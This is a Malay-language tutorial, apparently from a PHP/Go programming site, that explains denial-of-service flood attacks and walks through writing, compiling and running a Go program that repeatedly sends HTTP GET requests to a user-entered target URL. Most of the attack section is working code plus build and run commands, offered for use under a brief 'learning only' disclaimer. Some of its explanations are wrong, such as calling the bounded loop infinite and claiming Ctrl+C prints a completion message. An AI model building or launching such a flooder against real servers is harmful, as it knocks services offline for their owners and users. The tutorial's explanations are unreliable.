Mari kita bercakap tentang prinsip serangan banjir di Golang

Serangan banjir ialah kaedah serangan rangkaian berniat jahat yang membebankan pelayan sasaran dengan memalsukan sejumlah besar permintaan, menyebabkan perkhidmatan menjadi tidak tersedia. Jadi bagaimana untuk menulis penyerang banjir mudah menggunakan Golang? Artikel ini akan memperkenalkan prinsip, pengekodan dan penggunaan serangan banjir di Golang.

1. Prinsip serangan banjir

Pertama sekali, marilah kita memahami prinsip serangan banjir. Apabila kami biasanya menyemak imbas sumber rangkaian, selepas kami memasukkan alamat laman web dalam bar alamat, permintaan HTTP akan dihantar ke pelayan sasaran. Permintaan HTTP ini mengandungi parameter yang kami perlukan dan pelayan akan mengembalikan sumber atau data yang sepadan selepas menerima permintaan.

Prinsip serangan banjir adalah untuk mensimulasikan permintaan biasa, tetapi ia memerlukan sejumlah besar permintaan palsu, membenarkan pelayan memproses permintaan ini secara berterusan, menyebabkan sumber pelayan kehabisan, tidak dapat terus bertindak balas terhadap permintaan biasa, dan akhirnya menyebabkan pelayan sasaran turun.

Prinsip serangan banjir adalah sangat mudah, dan pelaksanaan kod juga sangat mudah.

2. Tulis kod

Seterusnya, kami mula menulis kod.

Tulis kod permintaan rangkaian yang paling mudah:

func httpGet(url string){
    resp, err := http.Get(url)
    if err != nil {
        log.Println(err.Error())
        return
    }
    defer resp.Body.Close()
}

Kod di atas melaksanakan permintaan GET yang mudah dan menutup Badan respons.

Seterusnya, kita perlu melaksanakan fungsi yang mencetuskan serangan banjir. Kita perlu menentukan gelung tak terhingga untuk terus memulakan permintaan rangkaian untuk mencapai serangan banjir.

func flood(url string, num int){
    i := 0
    for {
        i++
        httpGet(url)
        if i > num{
            log.Println("Attack finished.")
            return
        }
    }
}

Dalam kod di atas, kami mentakrifkan pembolehubah i untuk merekodkan bilangan permintaan yang dihantar. Dalam setiap gelung, kami memanggil fungsi httpGet untuk menghantar permintaan kepada pelayan sasaran. Apabila bilangan permintaan yang dihantar lebih besar daripada bilangan yang ditetapkan, serangan banjir akan dihentikan. Dalam kod di atas, kami menggunakan pakej log untuk mengeluarkan mesej bahawa serangan telah tamat Kami juga boleh mengeluarkan maklumat terperinci semasa serangan untuk memudahkan analisis kemudian.

Semasa kita melaksanakan serangan banjir, kita juga perlu mempertimbangkan keadaan berhenti program utama. Kami boleh mengawal hentian program secara manual melalui input papan kekunci. Tambahkan kod berikut:

func main(){
    var url string
    var num int
    
    fmt.Print("Target url: ")
    fmt.Scanf("%s", &url)
    
    fmt.Print("Number of requests: ")
    fmt.Scanf("%d", &num)
    
    fmt.Println("Press Enter to start attack.")
    bufio.NewReader(os.Stdin).ReadBytes('\n')
    
    flood(url, num)
}

Selepas menjalankan program, kita boleh memasukkan URL sasaran dan bilangan permintaan ke dalam program, dan kemudian tekan Enter untuk memulakan serangan. Apabila bilangan serangan mencapai nombor yang ditetapkan atau program dihentikan secara manual, serangan akan tamat.

3. Cara menggunakan

Di bawah, kami akan memperkenalkan cara menggunakan program ini untuk melakukan serangan banjir.

Pertama, kita perlu memasukkan direktori program dalam terminal dan menggunakan arahan go build untuk menyusun.

go build flood.go

Selepas penyusunan selesai, kita boleh menjalankan program:

./flood

Kemudian, ikut gesaan untuk memasukkan URL sasaran dan bilangan permintaan, dan tekan Enter untuk memulakan menyerang.

Semasa program berjalan, anda boleh menghentikan program dengan menggunakan kekunci pintasan Ctrl + C. Pada ketika ini, program akan keluar dari gelung semasa dan mengeluarkan mesej bahawa serangan telah tamat.

Perlu diingatkan bahawa serangan banjir adalah kaedah serangan ganas dan hanya untuk tujuan pembelajaran dan penyelidikan sahaja. Jangan gunakan program ini untuk serangan haram.

Ringkasan

Artikel ini memperkenalkan cara menggunakan Golang untuk melaksanakan serangan banjir. Kami mempelajari cara serangan banjir berfungsi, langkah untuk mengekodnya dan cara menggunakannya. Pada masa yang sama, kita juga perlu sentiasa memberi perhatian kepada keselamatan rangkaian dan melindungi persekitaran rangkaian kita.

Atas ialah kandungan terperinci Mari kita bercakap tentang prinsip serangan banjir di Golang. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!